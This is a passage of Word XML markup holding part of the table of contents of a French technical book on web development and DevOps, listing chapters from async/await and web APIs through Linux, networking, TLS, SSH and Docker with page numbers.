      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>266</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>30. Consommer une API web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>275</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>31. Stockage, état et persistance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>283</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie V — Qualité, performance et mise en production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>292</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>32. Déboguer et tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>292</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>33. Performance web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>301</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>34. Sécurité côté client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>309</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>35. Versionner, construire et outiller son projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>317</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>36. Projet final : d'un dossier vide à un site en ligne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>325</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie VI — Approfondissements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>338</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">37. CSS avancé : couches, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> et requêtes de conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>338</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>38. Composants web et système de design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>347</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>39. Internationalisation et contenu multilingue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>356</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>40. Maintenir un site dans le temps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>365</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie VII — Le Web comme plateforme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>373</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>41. Applications web progressives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>373</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>42. SVG, canvas et visualisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>43. Polices web et typographie fine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>392</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>44. Tester une interface : unité, intégration et bout en bout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>399</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>45. Tableaux de données et listes longues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>408</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>DevOps, cloud et fiabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>417</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie I — Culture DevOps et systèmes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>425</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>46. La culture DevOps et ses métriques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>425</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>47. Linux : système de fichiers, processus et droits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>433</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>48. Le terminal au quotidien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>441</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>49. Scripts shell et automatisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>449</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>50. Git avancé : branches, rebasage et récupération</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>458</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>51. Forges, revues et collaboration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>466</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>52. Provisionner une machine et gérer ses paquets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>474</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>53. Environnements, secrets et configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>483</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie II — Réseaux, protocoles et serveurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>491</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>54. Réseaux : modèles et couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>491</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>55. Adressage IP, sous-réseaux et routage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>56. DNS : nommer, résoudre, diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>508</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>57. HTTP/1.1, HTTP/2 et HTTP/3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>516</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>58. TLS et certificats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>524</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>59. SSH : accès distant et tunnels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>532</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>60. Serveurs web : Nginx et Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>540</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>61. Répartition de charge, proxy et CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>548</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie III — Conteneurs et orchestration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>556</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>62. Docker : conteneurs, images et cycle de vie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>556</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
